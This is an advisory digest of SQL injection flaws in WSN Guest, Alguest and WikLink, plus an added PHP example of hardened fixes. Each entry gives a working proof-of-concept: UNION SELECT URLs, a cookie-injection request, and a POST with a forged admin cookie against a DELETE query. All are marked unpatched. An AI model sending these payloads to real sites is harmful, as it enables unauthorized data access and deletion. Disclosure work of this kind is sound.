Recent SQL Injection vulnerabilities
Here is a short summary of recent SQL Injection vulnerabilities discovered by the eVuln team. The full list with details is available on the eVuln Security Advisories page.
time SQL Injection vulnerability in WSN Guest.
Description.
It is possible to inject an SQL expression using the time parameter in the memberlist.php script.
The time parameter is used in an SQL query without proper sanitization.
Exploit.
SQL Injection PoC:
http://website/wsnguest/memberlist.php?field=time%27&ascdesc=asc&perpage=25&debug=1
SQL expression injection is possible after ORDER BY.
Solution
Solution is not available.

wsnuser Cookie SQL Injection vulnerability in WSN Guest.
Description.
It is possible to inject an arbitrary SQL query using the wsnuser cookie parameter in the index.php script.
The wsnuser parameter is used in an SQL query without proper sanitization.
Exploit.
Cookie SQL Injection PoC. HTTP query:
GET /wsnguest/index.php?debug=1 HTTP/1.0
Host: website
Cookie: wsnuser=[SQL Injection]
Solution
Solution is not available.

elimina SQL Injection vulnerability in Alguest.
Description.
It is possible to inject an arbitrary SQL query using the elimina parameter in the elimina.php script.
The elimina parameter is used in an SQL query without any sanitization.
Exploit.
Vulnerable code: $query = "DELETE FROM guest WHERE id=$elimina";
SQL Injection PoC:
POST /alguest/elimina.php HTTP/1.0
Host: website
Cookie: admin=1
Content-Length: N

send=elimina&elimina=[SQL Injection]
Solution
Solution is not available.
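The following PHP example is added here and is not taken from eVuln or the affected projects. It shows the Alguest DELETE rewritten with an integer check and a bound parameter, plus an allowlist for ORDER BY input of the kind described in the WSN Guest memberlist.php advisory. The guest table, its columns and the function names are assumptions; an in-memory SQLite database stands in for the real one.

```php
<?php
declare(strict_types=1);

// Added example, not Alguest or WSN Guest code. The guest table, its columns
// and the sample rows are constructed; in-memory SQLite keeps the demo offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE guest (id INTEGER PRIMARY KEY, msg TEXT)');
$db->exec("INSERT INTO guest (msg) VALUES ('a'), ('b'), ('c')");

// Vulnerable form quoted in the advisory, for comparison only:
//   $query = "DELETE FROM guest WHERE id=$elimina";

// Hardened delete: reject anything that is not a positive integer, then bind
// the value so it can never become part of the SQL text.
function deleteGuest(PDO $db, string $raw): int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 0; // malformed input: no statement is executed
    }
    $stmt = $db->prepare('DELETE FROM guest WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Identifiers in ORDER BY cannot be bound as parameters, so request values are
// mapped onto a fixed allowlist with a default for anything unknown.
function listGuests(PDO $db, string $field, string $ascdesc): array
{
    $columns = ['id' => 'id', 'msg' => 'msg']; // allowed sort keys
    $column  = $columns[$field] ?? 'id';
    $dir     = strtolower($ascdesc) === 'desc' ? 'DESC' : 'ASC';
    return $db->query("SELECT id, msg FROM guest ORDER BY $column $dir")
              ->fetchAll(PDO::FETCH_COLUMN);
}

var_dump(deleteGuest($db, '2'));          // well-formed id
var_dump(deleteGuest($db, '2 OR 1=1'));   // constructed malformed input, rejected
print_r(listGuests($db, "msg'", 'desc')); // unknown sort key falls back to id
```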

fold and site SQL Injections in WikLink.
Description.
It is possible to inject an arbitrary SQL query using the fold and site parameters in the editCategory.php and editSite.php scripts.
The fold and site parameters are used in an SQL query without any sanitization.
Condition: magic_quotes: off
Exploit.
SQL Injection example1:
http://website/wiklink/editCategory.php?action=edit&fold=9999'%20union%20select%201,2,3,4/*
SQL Injection example2:
http://website/wiklink/editSite.php?action=edit&site=999'%20union%20select%201,2,3,4,5/*
Solution
Solution is not available.

id SQL Injection in WikLink.
Description.
It is possible to inject an arbitrary SQL query using the id parameter in the getURL.php script.
The id parameter is used in an SQL query without any sanitization.
Condition: magic_quotes: off
Exploit.
SQL Injection example: http://website/wiklink/getURL.php?id=-1' union select 1111/*
Solution
Solution is not available.